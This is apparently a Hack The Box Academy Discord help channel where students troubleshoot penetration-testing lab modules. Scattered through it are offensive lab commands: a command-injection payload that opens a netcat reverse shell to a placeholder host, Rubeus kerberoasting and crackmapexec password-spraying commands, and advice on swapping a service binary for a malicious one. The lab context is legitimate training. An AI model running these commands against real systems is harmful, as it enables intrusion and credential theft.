#modules

1 messages · Page 257 of 1

cloud urchin
#

the pwnbox doesn't run on your network, it runs in a browser on htb's infrastructure

#

as safe as any other website

#

it'd really be on your IT team to deem if it's okay or not accessing HTB from company resources

signal bane
#

is anyone else getting this error?

wanton idol
#

could be an ad blocker

rustic sage
#

Man, the "getting started" module is hard lol.

dim wolf
fringe urchin
fathom pendant
#

Be able to get in the mindset of "did I read everything"

rustic sage
#

I'm tired, gonna go out to eat...

misty venture
#

You think i didn't try i contact them but they are smoking something weird there i don't know

fathom pendant
#

Well we won't hack your account back

misty venture
#

Ok then thank you for your time

cloud urchin
#

Reaching out to Steam is your only recourse

fathom pendant
#

Ah NN as well, additional negative for you

#

Go take your 88 elsewhere

misty venture
fathom pendant
#

Reaching out to legitimate steam support

fathom pendant
misty venture
#

Do you have a link or something because i only speak with a bot on a email

fathom pendant
#

Nope

trail flicker
# signal bane

i switched to firefox when this happen, didnt fix then i just reset my pc got on firefox and found the academy tab

daring totem
#

I'm struggling to progress in the Windows attack and defense module. I tried running the Rubeus application through the command prompt, but it failed; the application seemed to start but then immediately closed. Has anyone else encountered this issue? (i am trying to open it after launching rdp)

cloud urchin
#

can you show a screenshot of the command and error

daring totem
#

no error message and the command I used is start C:\Users\bob\Download\Rubeus.exe

fathom pendant
#

you don't need to do start

#

it's a precompiled binary

#

you can just call it normally

#

also

#

i think it's Downloads not download

#

but i could be wrong

#

looks like it's silent erroring and not telling you file not found

wanton idol
#

do u have any prior experince with the cmd? @daring totem

daring totem
#

yeah I spelt downloads on the previous message wrong but I did type it in with the s at the end like you mentioned

fathom pendant
#

is that the filepath

#

also .exe not ,exe

#

it's likely silent erroring on you

#

meaning no feedback on if it's working or not

daring totem
#

it is a .

fathom pendant
#

do this: cd to the downloads directory

#

cd to the directory that Rubeus is in

#

do ./Rubeus.exe

#

alternatively you can start it without using the start command

heavy marsh
#

For the Attacking Common Applications Skills Assessment 1, I'm having trouble figuring out how the correct CVE or searchsploit or msfconsole option is found.

#

I tried

#

Did not work, just gave some code from one of the pages that was useless.

#

Tried a couple of others but nothing was useful even though it was matching the exact version.

#

Then in the walkthrough they just pull a random CVE out of the hat and it works?!

#

Frustrating. I feel like the portion of finding out which exploit to use either wasn't covered, or the expectations were not clear as to how many different options would have to be tried first.

fathom pendant
#

Well, reverse it - look at why the exploit they chose was right

#

perhaps they used an exploit that wasn't for a specific version rather a range of versions < N

heavy marsh
#

Glad these walkthroughs are here now otherwise I would be sifting for a while for the right exploit

daring totem
fathom pendant
#

no idea

#

just offering other ideas

heavy marsh
#

There are over 30

fathom pendant
#

then likely your enumeration was just off

heavy marsh
#

The enumeration led me specifically to a shortlist in searchsploit, but none of them worked. Searching in metasploit only pulled up one which did not work. The one used in the walkthrough seems like it was picked out of a hat.

#

That's fine I'll just roll with it.

#

I just wish they explained how they got there since it wasn't in the module

wanton idol
#

have u just tried doing .\Rubeus.exe kerberoast /outfile:spn.txt in the Downloads folder

mellow holly
#

.\Rubeus.exe kerberoast /outfile:spn.txt in Powershell
or
Rubeus.exe kerberoast /outfile:spn.txt from CLI
both work. But not too sure on what he is actually doing to run Rubeus since they have not posted screenshot

wanton idol
#

fr

#

lowkey think he should learn the basics of cmd first

mellow holly
#

I suggested that earlier to them

wanton idol
#

yeah i saw

#

seems like he just jumped to zero experince to somewhat advanced topic

#

time to do AEN BLIND sadglas

soft cedar
upbeat knot
#

hey guys, it says target is spawning but I am waiting for 20 minutes and it`s still spawning, does anybody have the same issue?

quasi summit
#

same

fresh shard
#

same here

wanton idol
#

use EU 2 vpn

shut quest
shut quest
upbeat knot
#

it spawned eventually, but took quite some time

upbeat knot
tropic rune
#

Hi guys, I'm doing the windows os module and on the question that asks "Find the non-standard directory in the C drive. Submit the contents of the flag file saved in this directory." what exactly does that mean? I put in the command that lets me see the tree of folders and files and I know what file the question is talking about but idk how I'm supposed to submit contents of it

shut quest
tropic rune
#

That would be Academy right?

shut quest
cloud urchin
#

Well there you go.

shut quest
#

Cool remove the spoiler 😉

tropic rune
quick magnet
#

hi im in module WINDOWS EVENT LOGS & FINDING EVIL
section Analyzing Evil With Sysmon & Event Logs
question 1,
already follow the step to replicate DLL hijack with calc.exe and reflective_dll.x64.dll, its work to show popup mainDLL
but in my event viewer don't trigeer event ID 7.

cloud urchin
shut quest
tropic rune
graceful mortar
weary torrent
#

hey guys, currently on Introduction to Malware analysis module, debugging section. there is some resources we need to download on our host cause they're not in pwnbox or target windows vm. How did you transfer those resources from your host to pwnbox and then to target windows vm? copy-paste or drag-drop doesn't work on my end

cloud urchin
#

can't pwnbox reach the internet and download it directly there?

normal sand
#

Hi. I've got a question related to the Password Attacks module.

On the page I've linked, they've mentioned two modes within John the Ripper: Single Crack Mode and Wordlist Mode. Under Single Crack Mode they mention the --wordlist option, as well as the --rules option. These two options are once again mentioned under the Wordlist Mode.

I'm struggling to see the difference between the two modes. Is there really a difference? If so, could you please explain?

Thank you 🙂

cloud urchin
#

Was there something specific or just in general?

weary torrent
cloud urchin
weary torrent
cloud urchin
weary torrent
cloud urchin
cloud urchin
# weary torrent are you trolling?

No. Your original message never said it was from the resources section of HTB, it just said you had to download some resources so I didn't connect the two together.

normal sand
cloud urchin
normal sand
cloud urchin
#

actually nm

#

re-reading this i'm wrong, single crack mode appears to just use the built in wordlist for john

#

its wordlist mode that uses the wordlist, and then there's incremental mode

#

tbh i've never used the built in list

normal sand
cloud urchin
#

i pretty much use wordlist mode

#

that seems to be it

#

but wordlist mode also allows you to apply rules

#

not sure if it can be done in single crack mode based on what module

#

ohhhhhh i see

#

the rules for john works different than hashcat

#

it just mangles the passwords so it probably can be used with single crack mode

normal sand
cloud urchin
#

it will increment all characters. For example it will start with AAAAA, then go BAAAA, CAAAA

#

... ZZZZX, ZZZZZ

#

it increments through all characters

#

extremely time consuming, essentially brutce forcing the password

normal sand
#

So if the password is 8 digits, does it start from just one digit first, tries everything, then moves onto two digit combinations and so on?

#

Until its tried all possible 8 digit combinations using the charset.

cloud urchin
#

yeah looks like it'll try all possible characters from the set

normal sand
cloud urchin
#

so better than a pure brute force

#

Incremental mode generates the guesses on the fly, while wordlist mode uses a predefined list of words. At the same time, the single crack mode is used to check a single password against a hash

#

that kinda sums it up

#

then the --rules will apply extra rules, for example it may replace A with @

#

or E with 3

normal sand
cloud urchin
#

no because a brutce force attack is completely blind and just starts from zero incrementing up. john takes a characters from the charset

#

so the charset will probably have less characters inside of it, while a brutce force uses all characters possible

normal sand
#

I see. Thanks a lot.

cloud urchin
#

i went to your youtube and tbh it's kinda bad. some of your videos also have watermarks as if you stole them instead of making them yourself.

fading isle
#

my videos only
any hacker is here?

cloud urchin
#

even your logo is stolen

spark spruce
#

module : Injection attack
skill assessment

I have found internal hosts running on target through /etc/hosts

but don't know how to access it

fading isle
#

ass

fading isle
#

i took the model but i keep my name

cloud urchin
#

uh huh

#

and your youtube videos where you stole videos that have watermarks along with 'your' logo? got an excuse for that one?

next bronze
#

stealing assets? no way bruh, you wouldn't download a car

fading isle
#

rhx is my brother

#

we both post same video

shut quest
#

<@&861185840277487616>

eager ledge
#

Hi,

I am doing Medium lab of "Attacking Common Services". I managed to find 5 open TCP ports.
Out of them, I tried anonymous login, default credentials and password bruteforcing(using user list and password list provided in the Resources section) for FTP server but failed.
I have got the zone file from the DNS server but that is not much help.
I tried enumerating the usernames in POP3 server, but it gives OK response even for the wrong usernames. I tried bruteforcing the password using hydra, but I get ERR Disconnected for inactivity during authentication. error after a while.

I checked the forum and it says that we should be able to find 6 open TCP ports. I tried resetting the machine and waited for 5 minutes before scanning again. But all I get is 5 ports. I am now running nmap full port scan(-p-). However, over time it shows increasing trend of remaining time. It currently shows 2:10:25 remaining. Am I missing something? What am I doing wrong?

stark lark
eager ledge
shut quest
shut quest
eager ledge
shut quest
#

Give that a try or adding -T4

next bronze
#

also try using the EU servers

eager ledge
#

I am using the pwnbox with lowest latency:

#

I see Increasing send delay for 10.129.47.248 from 5 to 10 due to max_successful_tryno increase to 6 messages in the verbose output of nmap and while overall remaining time for nmap has decreased after using -T4 flag, there is still increasing trend in remaining time:

next bronze
#

I'm referring to the vpn servers, that's where the target actually spawns at

eager ledge
#

Oh. I am currently using EU-Academy-1

next bronze
#

hmm if the scan is still wrong, switch the pwnbox server to EU too so that the latency between pwnbox and the target will be the lowest

eager ledge
#

The remaining time is decreasing right now. So, I will just wait a little and see how that goes. Thanks for the help!

shut quest
#

I'd try to keep the two geographically as close as possible

eager ledge
#

I buy cubes as I complete the modules and need more. I do not have student subscription. So, no hints🤐

shut quest
#

Hints aren't for every question and they are still there. The walk through which is barely a couple weeks old has always only been for annual subscriptions.

stark lark
# shut quest Make sure your IP is correct and that you're connected to the VPN. Try restartin...

Thanks it worked - I cannot seem to progress with the task.

I've tried the following:

||Full Nmap port scan, found 4 open ports (21, 22, 53, 2121)

  • Tried anonymous login on 21 and 2121
  • Tried logging in with the user:pass provided on 21 and 2121 - no files on the ftp server.
  • Tried connecting on port 22 using the provided credentials - Permission denied (public key) -> tried with -o PreferredAuthentications=password but didnt make a difference.
  • Tried enumerating DNS zones and doing zone transfers to int.inlanefreight.htb (and others) but without luck.
  • Tried numerous other enumeration on the ports||

What could I possibly have missed?

hollow knoll
#

Determine the IP address of the C2 (Command and Control) server and enter it as your answer. I can't figure out what artifacts I should be looking for here. Can anyone give a hint?

shut quest
shut quest
spark spruce
west rampart
#

Morning buddys

hollow knoll
shut quest
hollow knoll
shut quest
west rampart
#

got my first CVE

#

so happy and hyped

bronze nova
shut quest
west rampart
#

i hope it's a good one. took me some hours

shut quest
verbal perch
#

Hello gentlemen!

west rampart
#

it's not. i got it confirmed

#

oh i'm dumb. wr0ong channel

tulip dragon
#

when i try to upload .json file on bloodhound all files uploded except this one

#

any idea why i am having this issue

#

.\sharphound.exe -c all

tranquil axle
#

If you start sharphound it tells you for which version it is

tulip dragon
#

i will look into it , but i installed latest only today

#

both

next bronze
#

you're using the legacy version, the newer sharphound is only compatible with the community edition

bronze nova
fathom pendant
#

It depends

next bronze
#

... because it's just an info section and there's nothing to attack, you'll get the ip in the following sections once you spawn the targets

fathom pendant
#

One of the sections details that some scenarios have a parrot box on 172.16.5.225 if I'm recalling, but they'll tell you that

faint hill
#

Hi, sorry if this is not the rght place to ask but I need help with the Dante Pro-lab. Not so much with cracking it (I'm 25% through at the moment) but more wondering why it is that I have to go back and repeat steps (or does everhting have to be re-done if someon resets the lab?). What channel / where can I ask this? The interface of the discord isn't particularly clear. Also are the labs suffering grom connectivity issues at the moment. I can;t get anything working.

fathom pendant
rustic sage
#

Windows Priv Esc - Citrix Breakout (can't connect to target).
I've logged in to the portal using the pmorgan credentials, but when I try to connoect to the virtual desktop I get an error sayinging that "an error occured wihle mkaing the requested connection." I dowloaded linuxx86 zip file when I first vistied the site, but I was wondering why I can't connect. I've seen there's a launch.ica file that I might have to have, but I can't find it amongst the extracted files. If anyone could help I'd greatly appreciate it

tulip dragon
#

@fathom pendant aaaaaae congrants

#

no backspace button 😔😔

bronze nova
fathom pendant
#

Well no

#

You connect to the 10.129.x.x target

#

Then either pivot or connect through that target

#

You don't have direct access to that subnet just from the vpn/pwnbox alone

lavish mango
# rustic sage Windows Priv Esc - Citrix Breakout (can't connect to target). I've logged in to...

Note: Double click on .ica file to open with Citrix Receiver Engine.

[Encoding]
InputEncoding=UTF8

[WFClient]
CPMAllowed=On
ProxyFavorIEConnectionSetting=Yes
ProxyTimeout=30000
ProxyType=Auto
ProxyUseFQDN=Off
RemoveICAFile=yes
TransparentKeyPassthrough=FullScreenOnly
TransportReconnectEnabled=On
VSLAllowed=On
Version=2
VirtualCOMPortEmulation=Off

[ApplicationServers]
Default $P5=

[Default $P5]
Address=10.13.38.15:1494
AutologonAllowed=ON
BrowserProtocol=HTTPonTCP
CGPAddress=*:2598
ClearPassword=E362BFFF6FD12E
ClientAudio=On
DesiredColor=8
DesiredHRES=640
DesiredVRES=480
DoNotUseDefaultCSL=On
Domain=\08532F0AC3339E9B
FontSmoothingType=0
InitialProgram=#Default $P5
LPWD=15
LaunchReference=441882447C2E5E7351AEC1C6F450B2
Launcher=WI
LocHttpBrowserAddress=!
LogonTicket=E362BFFF6FD12E08532F0AC3339E9B
LogonTicketType=CTXS1
LongCommandLine=
NRWD=1123
ProxyTimeout=30000
ProxyType=Auto
SFRAllowed=Off
SSLEnable=Off
SessionsharingKey=-0gdQzE/Jw88B6/WlHfcfzD
StartIFDCD=1711008070667
StartSCD=1711008070667
TRWD=15
TWIMode=Off
Title=Default
TransportDriver=TCP/IP
UILocale=en
WinStationDriver=ICA 3.0

[Compress]
DriverNameWin16=pdcompw.dll
DriverNameWin32=pdcompn.dll

[EncRC5-0]
DriverNameWin16=pdc0w.dll
DriverNameWin32=pdc0n.dll

[EncRC5-128]
DriverNameWin16=pdc128w.dll
DriverNameWin32=pdc128n.dll

[EncRC5-40]
DriverNameWin16=pdc40w.dll
DriverNameWin32=pdc40n.dll

[EncRC5-56]
DriverNameWin16=pdc56w.dll
DriverNameWin32=pdc56n.dll
gray chasm
#

Are you experiencing problems with lab connectivity?

glacial elm
gray chasm
#

it launches the instance correctly and gives me IP, but when I launch an ICMP packet I have no connectivity.

glacial elm
#

oh wow, well you're getting further than me

gray chasm
#

jajaja

gray chasm
fathom pendant
gray chasm
fathom pendant
glacial elm
gray chasm
#

I am asked to apply port scanning with nmap

fathom pendant
#

Try EU?

glacial elm
#

yu[

gray chasm
#

I am using EU

glacial elm
#

I tried UK

fathom pendant
#

That's pwnbox region

#

Not vpn

glacial elm
#

Good point

#

Eu-academy-1

#

I mean I was trying to pwnbox... didn't feel like logging in on my kali box. I'll try connecting to another VPN on my Kali box.

fathom pendant
#

Vpn still matters with pwnbox

#

Vpn = targets
Pwnbox region = pwnbox spawn

rustic sage
lavish mango
#

That module and that ica connection is shaky. I had to respawn that module a lot to finish studying it.

lavish mango
#

your box->spawned machine->.ica connection to target

vernal rain
#

Hello! I am currently doing section "Protected Files" of "Password attacks" module. It requires to use ssh2john.py script, which does not work with the python version installed in pwnbox (python - 3.9.2).
Please update ssh2john.py to the latest version (i just downloaded the latest from github).

rustic sage
gray chasm
#

Still no labs working?

lavish mango
rustic sage
lavish mango
rustic sage
tulip dragon
lavish mango
#

<@&861185840277487616>

next bronze
gray chasm
#

I have tried eu 1 and eu 2 and it doesn't work....

errant copper
#

how do i use hack the box from ubuntu

fathom pendant
#

Download vpn

errant copper
#

how

rustic sage
#

Log into your account

fathom pendant
#

Click download vpn

errant copper
#

i have

acoustic owl
errant copper
acoustic owl
#

sudo openvpn ./yourvpnfile.ovpn

fathom pendant
#

Or the "connect to htb" button in the top right of the main site

burnt owl
#

Hey I am doing Windows Privilege Escalation > SeDebugPrivilege and towards the end of the page they recommend to use the SeDebugPrivilegePoC from https://github.com/daem0nc0re/PrivFu/tree/main/PrivilegedOperations/SeDebugPrivilegePoC But I don't really get how to use this. Do I have to compile the poc into an exe or how do I make it into some kind of application.

GitHub

Kernel mode WinDbg extension and PoCs for token privilege investigation. - daem0nc0re/PrivFu

fathom pendant
#

Or some other compiler

burnt owl
#

yeah probably, but that's for an other time

rustic sage
#

I'm unsure if anyone else has used this for the module**/158/section/1427** creating a reverse shell through Reverse Port Forwarding on the Windows host.

Using Invoke-WebRequest for me didn't work and I tried quite a few other file download requests and none seemed to download from the ubuntu server.

Instead of wasting time on web requests, on the Windows host I used Internet Explorer, added the Ubuntu web server address into the "Trusted Sites" settings for IE and I could download the payload file no problem.

Just thought I'd share that in the event some people have struggled with that section

tulip dragon
#

i can't find this in new CE bloodhound

muted kindle
#

i'm very confused i bitwise OR 0x0400 and 0x0010 it is 0x0410
where is 0x1010 coming from it claims its a combination of both but i dont see how itresults in 0x1010

timber hatch
#

module windows pirivlege escaltion / weak permissions what is the problem when we look at the screenshot?

muted kindle
timber hatch
#

i will try it again

gray chasm
#

Does anyone know why this happens?

findstr /SIM “Password” *.xml
FINDSTR: Out of memory

timber hatch
#

back to my problem: module windows pirivlege escaltion / weak permissions, is it right that you have to make the malicious binary for yourself with msfvenom and than you replace it right...?

gray chasm
timber hatch
#

alright. when i do that, then i have can't start it again.

#

i have always:
sc start SecurityService
[SC] StartService FAILED 1053:

gray chasm
#

Once you do that, if you start the service again it should run your binary

#

Even if it gives an error, it should be executed if it is correctly replaced.

timber hatch
#

ah ok

#

thx

muted kindle
next bronze
timber hatch
#

but something does not work...

muted kindle
timber hatch
#

ups, thanks forgot to run it with admin privs

gray chasm
haughty tree
#

Hey, I'm currently on the Shells & Payloads module in the "The Live Engagement" section. I managed to get host 1 but only after looking at the hint. I could not find the credentials for my life and I tried running default credentails of tomcat but that did not work and I can't understand how as I supposed to find those credentials

long orchid
#

hi, great day to you all, i am having issues with a room, i think its a very silly mistake from me, but i cannot solve the Linux fundamentals question where it asks How many total packages are installed on the target system?, could you please advice?

shadow cradle
next bronze
next bronze
long orchid
#

thats the thing, i don't even know how to look for them, i was using find and locate

next bronze
#

google ubuntu list installed pacakges

haughty tree
#

They should probably tell you that you have the credentials on your desktop cause wow I lost way too much time on this lol

next bronze
#

I mean, it is in the hint kek

haughty tree
#

True but I did waste a bunch of time before checking the hint lol

long orchid
shadow cradle
#

Hi All, I'm trying to redo the Pass The Ticket using only Rubeus. I can dump the ticket since shouldn't require any extra privilage. When I try to run rubens ptt /ticket etc to load the dumped ticket I get a permission denied. Is that expect? I'm already local adm.

golden condor
#

Can someone please help me with instagram account! Thats very important!

bold sinew
#

Hi all,

Do any of the 3 skills assessment labs at the end of the Password Attacks module require using credentials from previous labs in the password attacks module?

rustic sage
#

no

fringe urchin
pseudo kiln
#

how come Intro to Web Apps comes before Web Requests in the Infosec Foundations path ?

but then if you read the description of the Web Apps module, you are supposed to do Web Requests first no ?

rustic sage
#

how do i get to post images and get access to general in the server

stable bone
regal jewel
void kayak
fringe urchin
long orchid
#

i may be omiting something

next bronze
fathom pendant
#

Or replace wc -l with head and see what's going on

long orchid
#

"listing..."?

#

ooo

dim wolf
#

yup, it's a red team cert

long orchid
void kayak
fringe urchin
void kayak
#

gotcha, it's no big deal

north bramble
#

I am on EU academy 1. This VPN doesnt seem to work. How can I fix this?

fathom pendant
#

Change vpn regions

#

EU 2 seems to be most stable rn

north bramble
#

okay doing so

#

even this doesnt seem to work. been like this for 2 mins.

fathom pendant
#

I take it when you switch vpn regions you.

  1. close current connection attempt
  2. delete old file
  3. download new file
north bramble
#

I think I should stick to pwnbox while they fix the issues

fathom pendant
#

¯_(ツ)_/¯

#

Speak with support too

north bramble
fathom pendant
#

Green bubble bottom right of academy page

#

(Disable adblock)

compact patrolBOT
fathom pendant
#

There is no dedicated support on discord

north bramble
#

okay thanks

compact jacinth
#

Hi im doing ATTACKING COMMON SERVICES , Attacking SMB
Question 2 "What is the password for the username "jason"?"
I have done this one "crackmapexec smb 10.129.203.6 -u jason -p pws.txt --local-auth" but I dont understand what I am supposed to do help me please

fathom pendant
#

What exactly isn't working?

#

You're not providing any errors for us to work with

solid quarry
#

Is there a way / place to ask for a review in a module content? I did the DACL II module and the GPO Attack section on linux shows a tool called GPOwned, the author said no tool on linux right now can create / link gpo, I made a PR to this tool and got aproved that enable both creation and linkink

fathom pendant
#

I also advise adding | grep "+"

compact jacinth
fathom pendant
#

Well

#

The [-] means negative/failure

#

So by grepping for + or doing an inverse grep for STATUS_LOGON_FAILURE will only show the positive results

compact jacinth
#

I solved it I had edited the pws.txt file by mistake

#

missing passwords in list

fathom pendant
#

That'll do it

compact jacinth
#

I got the 10.129.203.6-GGJ_id_rsa on my desktop but when i try to ssh I get the Permission denied (publickey).

#

Do i need to input it somehow?

fathom pendant
#

Yes

#

-i [rsa_file]

#

Make sure the permissions are correct too

compact jacinth
#

This right "chmod +wx 10.129.203.6-GGJ_id_rsa"

fathom pendant
#

Nope

#

You need to make it so only you can read the file

#

I'd look into octal notation for file permission

#
owner | group | other
r(read) = 4
w(write) = 2
x(execute) = 1
add together for file permissions
744 = everyone can read, only owner can edit/execute
compact jacinth
#

Is it the permssion for 10.129.203.6-GGJ_id_rsa I need to fix?

#

I thinks is chmod 400

#

but i dont get it to work

#

also tried 600 but didnt work

fathom pendant
#

Any number +00 should work

#

Also make sure it's the right user you're trying to ssh to

compact jacinth
#

i did chmod 600 10.129.203.6-GGJ_id_rsa

#

not working

fathom pendant
#

"Not working"

#

That's not descriptive

#

Is it giving an error of some sort

#

Is the target still alive?

compact jacinth
#

jason@10.129.203.6: Permission denied (publickey).

#

yeah

fathom pendant
#

I take it you did get <file> when you downloaded it

#

I'd try redownloading the file and trying again

compact jacinth
#

I did now use get

#

not*

fierce mason
#

for the skills assessment in sqlmap essentials, is there supposed to be a clue in how the website reacts to when i send a specific string to know what sqlmap tamper scripts to use

compact jacinth
#

I dont get how to get the file

fierce mason
compact jacinth
#

we talk about smbmap right?

fierce mason
compact jacinth
#

i just dont know the command at all

#

i cant figure it out

#

dowload dosnt work

fathom pendant
#

If you connect with smb it's as simple as going into the share folder and doing get file

inner geyser
fathom pendant
#

smbclien.html

compact jacinth
#

Im looking for it but I really cant find any way to use get with smbclient

stark lark
#

Is it possible to mount /TechSupport from a specific port or doesn't that matter? I'm unable to view/open the currently mounted drive.

compact jacinth
#

when I do the command smbmap -H 10.129.203.6 -r "GGJ/id_rsa" i get the file onto my desktop

#

is that wrong?

slate shell
#

On password attacks networks services how did u guys fix the smb invalid reply from target error

compact jacinth
#

also trying this but not working

#

smbclient -U jason ////10.129.198.209//GGJ
Password for [WORKGROUP\jason]:
do_connect: Connection to failed (Error NT_STATUS_NOT_FOUND)

#

@inner geyser @fathom pendant

fathom pendant
#

It's either \\\\ip\\share OR //ip/share

#

The reason is because \ is an escape character

#

\\ reads it as a single \ and discord even uses it as well (this is double \)

fathom pendant
#

It's a combination of techniques

fierce mason
fathom pendant
#

I really don't remember, I didn't take many notes on this module as I usually do. Need to go back and add notes

#

I remember prefix and some other stuff

#

It was like prefix, tamper, and technique that were used

fierce mason
#

i got the flag but now its not accepting it

fathom pendant
#

Try making sure no extra white spaces

fierce mason
#

did that

cloud urchin
#

if you have the correct flag, it will accept it

#

so you either didn't input it correctly or you don't have the flag

fathom pendant
#

Or the flag is being output weird

weary torrent
glass quail
#

Module: File Inclusion
Section: Skill assessment
I have Fuzzed everything and I haven't found a way to get file inclusion or path traversal. I am curious about the contact page because that's the only way I can input. Can some one give me a hint?

cloud urchin
#

I would guess something to do with it trying to add to the administrato's group on the child domain instead of the parent domain, because in your screenshot htb-student is a part of child.inlanefreight.ad and you're trying to add a user to the inlanefreight.ad domain. I haven't done this module so I have no idea and someone else can probably provide a better answer, but I don't see anything in your commands telling it to add the user to the parent domain's group.

cloud urchin
#

Click on all links on the page until you find a parameter being input

glass quail
#

Ok I think I have all of them that have parameters will check again

#

I wonder if I'm digging to much

cloud urchin
#

you might be, it's kinda surface level

#

just click all the links and keep an eye on the url where you may be able to change the value of a parameter

glass quail
#

ok

rustic sage
ebon minnow
#

Is there a linux equivalent of the "Windows Event Logs & Finding Evil" module?

rustic sage
#

hi

#

every can someone help

heavy marsh
#

On the Attacking Common Applications Skills Assessment II, the vhost is not resolving to the ip, even though it is in my /etc/hosts file

#

They give the ip and

cloud urchin
#

show a screenshot of your /etc/hosts and the victim ip

heavy marsh
#

But the IP is the only thing that actually opens any site, the gitlab.inlanefreight.local doesn't work

#

Should I reset?

#

Also, it's asking for the URL of the Wordpress instance, there wasn't any wordpress instance.

cloud urchin
#

type nslookup gitlab.inlanefreight.local and show me the results

#

or just getent hosts gitlab.inlanefreight.local

#

you can even just do a simple ping to make sure it's resolving, most likely it is and it's something else

#

dig gitlab.inlanefreight.local +short

heavy marsh
#

Now I see what the problem is

#

I should have been using inlanefreight.local, not gitlab.inlanefreight.local

cloud urchin
#

you need both

#

you need all the vhosts

heavy marsh
#

I checked the walkthrough for the part about the Wordpress since there was no wordpress and I apparently need to use gobuster?

#

I don't remember what section that was in

fathom pendant
#

gobuster is just a web enumeration tool

#

like ffuf

cloud urchin
#

what the ffuf

heavy marsh
#

Yeah, I've used it plenty, I like it more than ffuf, I'll just have to go back and find where that is in this module

#

I only have gobuster in my notes for tilde enumeration and the Tomcat section

#

Nothing saying I need to fuzz for vhosts!!!

#

Nothing for ffuf in this one

#

I'm stumped.

#

I don't want to just follow the walkthrough for this one.

#

Okay so even the walkthrough isn't accurate, I checked the fuzzing command and it's not giving me the expected output

#

This is the full list

fathom pendant
#

¯_(ツ)_/¯

heavy marsh
#

The wc is almost 5000

fathom pendant
#

¯_(ツ)_/¯

tribal plinth
#

Distinguishing between creating and adding a user is important. GenericAll over a group allows you to directly modify group membership of the group so you can add a user into that group. However, you cannot create a new user into the domain with this right.
Additionally, this is considered as a spoiler for other students, so it’s advisable to remove it.

heavy marsh
cloud urchin
#

fyi i was able to access gitlab.inlanefreight.local without issue only adding that to my /etc/hosts file

fathom pendant
#

so could be their instance is bugged

cloud urchin
#

its possible, but he didn't run the command to see if the host resolved which was the initial problem. accessing the website is another thing, it doesn't run on port 80 for example.

#

but as long as the host is in /etc/hosts it should resolve to that ip you set, unless something is wrong with your box

#

which includes the blog site

heavy marsh
cloud urchin
#

mine redirected automatically. using firefox

heavy edge
#

holeeeeeeey moley

heavy marsh
heavy edge
#

that was fun

#

yes i completed it

heavy marsh
#

It automatically tacks on the 8180 for some reason

#

I mean 8081

#

When I manually enter 8180 it works fine with either the ip or the gitlab.inlanefreight.htb

fathom pendant
#

weird

heavy marsh
fathom pendant
#

¯_(ツ)_/¯

cloud urchin
#

i'm pretty sure the gitlab instance is on port 80

#

i didn't do anything special for that url

#

i could be misremembering what i did a few mins ago though haha

heavy marsh
#

This is what I get when I put in 8180 manually

#

It automatically goes to the sign in page

cloud urchin
#

ahh okay. i'm probably misremembering then.

#

oh yeah for the gitlab one yes, it wasn't on port 80

#

but it redirected me np

heavy marsh
#

Okay, I figured it out, had to clear web cache

#

It's resolving correctly now

#

Still doesn't solve my gobuster issue

heavy marsh
#

I tried the attackbox and it worked there

#

Could it be my vpn connection?

inner geyser
#

On Active Directory Attacks & Enumeration Skills Assessment 1, and can't figure out why one hash can be cracked and the other cannot. At first I thought it was an issue with hashcat/john versions on my machine, so tried it in PwnBox. Cracked the hash. So then I copied the hash from PwnBox to my machine, cracked the hash with hashcat. Both hash files look identical and I ensured no additional spaces were in either file using the following command:

echo 'insert hash here' | tr -d "[:space:]" > hash_to_crack_file

I can show a screenshot of the 2 hashes as a quick comparison but wasn't sure if that would be considered spoiler-y. Any ideas why my first hash is giving me a 'token length exception' error?

cloud urchin
#

Your hash format is broken in some manner or you're using the wrong mode

inner geyser
candid night
#

Hey guys, I'm curious. Is there a way to have access to a pivot host's network after another proxychain hop?
What do I mean by that:
Hosts:
A - Attack host
B - Pivot host
C - Target host

proxychains.conf file:
...
socks5 127.0.0.1 1080
socks5 127.0.0.1 1090

Logic: A ==tunnel with socks on 1080== B ==tunnel with socks on 1090== C

After creating the second tunnel and specifying the proxy in the proxy file, when I try to nmap back to the pivot host It show's me that it is down.
Is there a way so that I can always access hosts from each subnet? (assuming that all those hosts have their own)

fathom pendant
#

sometimes nmap/ICMP doesn't work well through proxychains

cloud urchin
#

You have access to C through B's proxychain. Are you trying to connect to network D that only C has access to?

rustic sage
#

**Windows Priv Esc Skills Assessment I **
I can get cmd injection with whoami, but when I try to use nc I can't get a request. I also tried using curl with an http server but that failed too. Here is the cmd I'm using. I'd greatly appreciate a little help.
|| 127.0.0.1 | nc PWNIP 1234 -e /bin/sh ||

cloud urchin
#

try a shell from here

undone narwhal
rustic sage
flint linden
#

Can anyone assist me, I don’t know what to do on how to pass this section

dim wolf
fathom pendant
#

there should be a "click here to spawn target" button

flint linden
#

Yes i spawned the target

fathom pendant
#

and above the first question should be instructions ssh to ip with username "username" and password "password"

flint linden
#

Yes it is

dim wolf
fathom pendant
#

reading the question will be more helpful to figuring out what you need to do

flint linden
#

I am trying

fathom pendant
#

neither of your screesnhots have the question in them

#

the questions will be near where you spawned the target on the academy page

flint linden
fathom pendant
#

well look at that, instructions given above the first question to ssh

#

and the credentials to do so

#

also for q1 uname would be the tool/command used

#

not the answer

flint linden
#

I did that

#

But it doesn’t work@

fathom pendant
#

"doesn't work" isn't descriptive

flint linden
fathom pendant
#

well yes

flint linden
#

I am sending a video

fathom pendant
#

because

  1. you need to ssh to the target
#
  1. uname -a
#

your main issue is that you haven't done step 1) connect to the target

#

because Linux is the kernel

#

if you do man uname or uname -h you can see what other flags you can use to get more specific info

#

add -sT

#

or -T4

tawdry acorn
#

What is the best way to learn programming languages?

grizzled schooner
#

Metasploit module in Pentester path

Trying to exploit the SMB share and metasploit keeps exploiting it but not creating a shell / completing the exploit any hints as to what I'm doing wrong? set the RHOSTS to the box IP, SMBUser to the user and SMBPass to the password

fathom pendant
#

you're gonna be real mad, but use what's in the Version Column

#

😉

grizzled schooner
dim wolf
#

you need to list the shares

#

is my bad i did not see the share name :(

flint linden
fathom pendant
#

blud doesn't know how it password prompts work

#

it's normal for password prompts not to show the password as you type it

#

it's best to copy/paste

#

to paste into terminal; ctrl-shift-v

#

gonna be honest chief it'd be better if you just described the problem instead of taking 420p videos from your phone

cloud urchin
#

it's actually 480

#

let's give the man some credit

#

oh oops i got it flipped it's 360p

fathom pendant
cloud urchin
#

ya i know 😛 just teasing you

cunning night
#

Is anyone else having trouble spawning the targets? I'm trying for over 30 minutes do spawn the target from AD Enumeration & Attacks - Skills Assessment Part II. Yesterday was normal 😦

cloud urchin
#

try changing vpn regions

cunning night
#

I did this with US EAST and WEST VPN's, but nothing changed. Will give a try to CA...

#

Now spawned, i guess i needed to complain somewhere lul

fathom pendant
#

